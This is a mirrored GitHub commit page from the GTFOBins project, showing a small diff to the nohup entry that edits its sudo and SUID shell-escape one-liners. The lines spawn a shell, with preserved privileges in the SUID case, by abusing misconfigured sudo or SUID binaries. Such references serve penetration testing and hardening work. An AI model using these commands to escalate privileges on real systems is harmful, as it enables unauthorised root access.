mirror of
https://github.com/GTFOBins/GTFOBins.github.io
synced 2024-12-25 06:19:27 +01:00
Remove redundant sudo from SUID category
This commit is contained in:
parent
bb4050810e
commit
db40142ea7
@ -8,7 +8,7 @@ functions:
|
||||
nohup "$COMMAND"
|
||||
cat nohup.out
|
||||
sudo:
|
||||
- code: sudo nohup /bin/sh -c "sh <$(tty) >$(tty) 2>$(tty)"
|
||||
- code: nohup /bin/sh -c "sh <$(tty) >$(tty) 2>$(tty)"
|
||||
suid:
|
||||
- code: sudo nohup /bin/sh -p -c "sh -p <$(tty) >$(tty) 2>$(tty)"
|
||||
---
|
||||
|
Loading…
Reference in New Issue
Block a user